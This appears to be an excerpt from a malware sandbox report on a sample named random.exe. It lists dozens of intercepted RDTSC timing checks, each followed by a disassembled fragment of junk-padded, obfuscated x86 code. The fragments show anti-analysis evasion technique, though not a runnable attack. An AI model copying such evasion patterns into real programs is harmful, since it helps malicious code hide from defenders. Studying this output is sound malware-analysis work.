              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47112C second address: 471130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 471130 second address: 471163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFCE8B91D06h 0x00000009 jmp 00007EFCE8B91D10h 0x0000000e jmp 00007EFCE8B91D15h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 471163 second address: 471169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 471169 second address: 47116F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47116F second address: 471193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFCE8B92350h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 471193 second address: 47119D instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47119D second address: 4711A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFCE8B92346h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 40F43E second address: 40F444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 40F444 second address: 40F448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4708DB second address: 4708E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4708E1 second address: 470905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007EFCE8B92346h 0x00000009 jmp 00007EFCE8B92359h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4726E9 second address: 4726EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4726EF second address: 472705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFCE8B9234Ah 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 472705 second address: 47270B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47270B second address: 472710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 40A416 second address: 40A421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 40A421 second address: 40A425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 40A425 second address: 40A435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4773B4 second address: 4773BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007EFCE8B92346h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47746C second address: 29FBAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007EFCE8B91D08h 0x0000000c popad 0x0000000d add dword ptr [esp], 5B62B8A3h 0x00000014 clc 0x00000015 push dword ptr [ebp+122D1465h] 0x0000001b cld 0x0000001c call dword ptr [ebp+122D3724h] 0x00000022 pushad 0x00000023 js 00007EFCE8B91D07h 0x00000029 xor eax, eax 0x0000002b clc 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 or dword ptr [ebp+122D36C7h], eax 0x00000036 mov dword ptr [ebp+122D3A5Eh], eax 0x0000003c mov dword ptr [ebp+122D2AEEh], ecx 0x00000042 mov dword ptr [ebp+122D2AEEh], edi 0x00000048 mov esi, 0000003Ch 0x0000004d pushad 0x0000004e jmp 00007EFCE8B91D19h 0x00000053 mov dh, FFh 0x00000055 popad 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a clc 0x0000005b lodsw 0x0000005d pushad 0x0000005e jmp 00007EFCE8B91D0Dh 0x00000063 sbb edi, 50EC7CA2h 0x00000069 popad 0x0000006a cmc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f sub dword ptr [ebp+122D2AEEh], eax 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jno 00007EFCE8B91D14h 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007EFCE8B91D0Fh 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 410FDC second address: 410FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47DC02 second address: 47DC0C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47DC0C second address: 47DC23 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFCE8B9234Ch 0x00000008 push ebx 0x00000009 jng 00007EFCE8B92346h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E2EB second address: 47E31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFCE8B91D16h 0x0000000a pushad 0x0000000b jmp 00007EFCE8B91D16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E31F second address: 47E330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFCE8B92346h 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E330 second address: 47E334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E5CE second address: 47E5D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E5D5 second address: 47E5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E73E second address: 47E760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFCE8B92355h 0x0000000c jnc 00007EFCE8B92346h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E760 second address: 47E764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E764 second address: 47E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B92351h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFCE8B92356h 0x00000010 popad 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 47E796 second address: 47E79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48435F second address: 484363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 484363 second address: 48436D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 484645 second address: 48465C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFCE8B92346h 0x0000000a jno 00007EFCE8B92346h 0x00000010 jnl 00007EFCE8B92346h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48480D second address: 48481C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007EFCE8B91D06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48481C second address: 484824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 484951 second address: 48495B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48495B second address: 48496D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48496D second address: 484973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 484973 second address: 48498E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFCE8B92355h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48498E second address: 4849A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007EFCE8B91D06h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4524A2 second address: 4301EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add dx, CEF4h 0x00000011 lea eax, dword ptr [ebp+124861B3h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007EFCE8B92348h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edx, 415CC93Fh 0x00000036 nop 0x00000037 push edx 0x00000038 ja 00007EFCE8B9234Ch 0x0000003e pop edx 0x0000003f push eax 0x00000040 push eax 0x00000041 js 00007EFCE8B92348h 0x00000047 pushad 0x00000048 popad 0x00000049 pop eax 0x0000004a nop 0x0000004b sub dword ptr [ebp+1244EBBCh], ebx 0x00000051 call dword ptr [ebp+122D1E33h] 0x00000057 pushad 0x00000058 push esi 0x00000059 jne 00007EFCE8B92346h 0x0000005f pop esi 0x00000060 jmp 00007EFCE8B92356h 0x00000065 jnl 00007EFCE8B9234Ch 0x0000006b jnl 00007EFCE8B92346h 0x00000071 popad 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 jns 00007EFCE8B92346h 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452926 second address: 29FBAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFCE8B91D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007EFCE8B91D0Ah 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D3714h], eax 0x0000001c push dword ptr [ebp+122D1465h] 0x00000022 jnc 00007EFCE8B91D0Ch 0x00000028 call dword ptr [ebp+122D3724h] 0x0000002e pushad 0x0000002f js 00007EFCE8B91D07h 0x00000035 xor eax, eax 0x00000037 clc 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c or dword ptr [ebp+122D36C7h], eax 0x00000042 mov dword ptr [ebp+122D3A5Eh], eax 0x00000048 mov dword ptr [ebp+122D2AEEh], ecx 0x0000004e mov dword ptr [ebp+122D2AEEh], edi 0x00000054 mov esi, 0000003Ch 0x00000059 pushad 0x0000005a jmp 00007EFCE8B91D19h 0x0000005f mov dh, FFh 0x00000061 popad 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 clc 0x00000067 lodsw 0x00000069 pushad 0x0000006a jmp 00007EFCE8B91D0Dh 0x0000006f sbb edi, 50EC7CA2h 0x00000075 popad 0x00000076 cmc 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b sub dword ptr [ebp+122D2AEEh], eax 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 jno 00007EFCE8B91D14h 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jmp 00007EFCE8B91D0Fh 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452ACD second address: 452B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007EFCE8B92346h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edi 0x00000014 push esi 0x00000015 jp 00007EFCE8B92346h 0x0000001b pop esi 0x0000001c pop edi 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push esi 0x0000002b pop esi 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452C34 second address: 452C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFCE8B91D0Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452D78 second address: 452D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFCE8B92346h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452D83 second address: 452D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452D89 second address: 452D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452D8D second address: 452DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007EFCE8B91D19h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452FB8 second address: 452FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movzx ecx, bx 0x0000000f push 00000004h 0x00000011 sub dx, 31EBh 0x00000016 mov ecx, 62F40CE8h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007EFCE8B9234Ch 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4532CF second address: 453315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007EFCE8B91D08h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 0000001Eh 0x00000029 movzx ecx, cx 0x0000002c nop 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007EFCE8B91D06h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45342A second address: 453430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 453430 second address: 453434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 452FE8 second address: 452FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4535E6 second address: 4535EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4536D4 second address: 4536D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4536D9 second address: 430D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a je 00007EFCE8B91D09h 0x00000010 xor ch, 0000007Ah 0x00000013 lea eax, dword ptr [ebp+124861F7h] 0x00000019 mov dword ptr [ebp+1245CC5Fh], ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007EFCE8B91D0Bh 0x00000026 jne 00007EFCE8B91D08h 0x0000002c popad 0x0000002d mov dword ptr [esp], eax 0x00000030 lea eax, dword ptr [ebp+124861B3h] 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007EFCE8B91D08h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 adc ecx, 5E2BA817h 0x00000056 mov dword ptr [ebp+122D2A17h], ebx 0x0000005c push eax 0x0000005d jmp 00007EFCE8B91D17h 0x00000062 mov dword ptr [esp], eax 0x00000065 mov edx, dword ptr [ebp+122D379Ah] 0x0000006b call dword ptr [ebp+122D23A2h] 0x00000071 pushad 0x00000072 push esi 0x00000073 jbe 00007EFCE8B91D06h 0x00000079 pop esi 0x0000007a pushad 0x0000007b jmp 00007EFCE8B91D0Bh 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 430D46 second address: 430D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 430D4F second address: 430D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 401DF7 second address: 401E07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007EFCE8B92346h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 401E07 second address: 401E11 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFCE8B91D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488800 second address: 488828 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007EFCE8B92348h 0x0000000f jo 00007EFCE8B9234Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488828 second address: 488830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488830 second address: 488834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488B19 second address: 488B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488B1F second address: 488B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488C76 second address: 488C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488C7A second address: 488C84 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFCE8B92346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488C84 second address: 488C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488DBB second address: 488DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFCE8B92346h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488DCA second address: 488DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488F3F second address: 488F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488F52 second address: 488F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007EFCE8B91D06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 488F67 second address: 488F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D617 second address: 48D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B91D0Ch 0x00000009 jo 00007EFCE8B91D06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D62F second address: 48D637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D637 second address: 48D63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D922 second address: 48D927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D927 second address: 48D93D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Fh 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48DA90 second address: 48DAB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007EFCE8B92346h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48DAB2 second address: 48DAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48DC6B second address: 48DC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48DC6F second address: 48DC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
